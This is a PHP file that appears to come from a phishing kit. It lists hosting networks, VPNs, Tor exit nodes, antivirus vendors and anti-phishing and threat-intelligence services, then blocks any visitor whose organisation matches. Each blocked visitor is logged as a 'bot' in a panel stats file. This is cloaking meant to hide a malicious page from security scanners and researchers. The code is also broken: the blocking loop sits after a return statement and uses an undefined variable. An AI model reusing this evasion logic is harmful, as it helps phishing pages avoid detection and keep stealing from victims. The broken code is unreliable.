<?php

return [
    'Computer Engineering',
    'DigitalOcean',
    'CHINANET',
    'BGPNET',
    'Think Huge',
    'Amazon',
    'Google',
    'QuickPacket',
    'Microsoft',
    'EGIHosting',
    'Yandex',
    'OVH',
    'SURF',
    'Cloudflare',
    'LINODE',
    'Cogent',
    'Hetzner',
    'Host Europe',
    'QuadraNet',
    'Leaseweb',
    'Psychz',
    'Contabo',
    'NetVirtue',
    'Choopa',
    'Wholesale Internet',
    'Vultr',
    'Hostinger',
    'Alexhost',
    'Vshield',
    'Sucuri',
    'Malwarebytes',
    'ESET',
    'Bitdefender',
    'Mcafee',
    'Zscaler',
    'Avast',
    'Sophos',
    'Symantec',
    'Webroot',
    'Cylance',
    'Trend Micro',
    'Kaspersky',
    'Fortinet',
    'Avira',
    'Palo Alto',
    'Checkpoint',
    'FireEye',
    'Proofpoint',
    'CrowdStrike',
    'F-Secure',
    'Carbon Black',
    'IBM Security',
    'Armor',
    'SentinelOne',
    'Alibaba Cloud',
    'UpCloud',
    'Scaleway',
    'BuyVM',
    'RamNode',
    'Endurance',
    'DreamHost',
    'SiteGround',
    'Namecheap',
    'InMotion',
    'A2 Hosting',
    'NordVPN',
    'ExpressVPN',
    'Private Internet Access',
    'CyberGhost',
    'HideMyAss',
    'Hotspot Shield',
    'TOR Exit Node',
    'Private Layer',
    'Total Server Solutions',
    'Cisco Systems',
    'Akamai Technologies',
    'Incapsula',
    'Barracuda Networks',
    'SonicWall',
    'Oracle Cloud',
    'Digital Energy Technologies',
    'Sharktech',
    'PhishTank',
    'Microsoft SmartScreen',
    'Netcraft Anti-Phishing',
    'Norton Safe Web',
    'McAfee SiteAdvisor',
    'Sophos Phish Threat',
    'AVG Threat Labs',
    'Bitdefender TrafficLight',
    'ESET Phishing Detector',
    'Fortinet Web Filter',
    'Palo Alto URL Filtering',
    'TrendMicro Web Reputation',
    'Comodo',
    'Trustwave',
    'Cyren',
    'Barracuda',
    'Check Point Threat Prevention',
    'F-Secure Browsing Protection',
    'Dr.Web Anti-phishing',
    'Spamhaus Domain Block List',
    'URLhaus Database',
    'Cofense Intelligence',
    'ZeroCERT Phishing Database',
    'zvelo Phishing Detection',
    'Abuse.ch',
    'CleanMX Phishing Database',
    'Malware Domain List',
    'Quttera Web Malware Scanner',
    'Krypt',
    'Unitas Global',
    'Pacnet',
    'GLOBALCONNECT',
    'GleSYS',
    'Datasource',
    'Zwiebelfreunde',
    'DataCorpore',
    'IMAFEX',
    'NNIT',
    'SERVERD',
    'Hangzhou',
    'CERT Polska',

];

foreach ($blocked_isps as $fuckisps) {
    if (stripos(strtolower($org), strtolower($fuckisps)) !== false) {
        $file = 'app/Panel/stats/stats.ini';
        $data = @parse_ini_file($file);
        $data['bots']++;
        update_ini($data, $file);
        die("COUNTRY NOT ALLOWED");
    }
}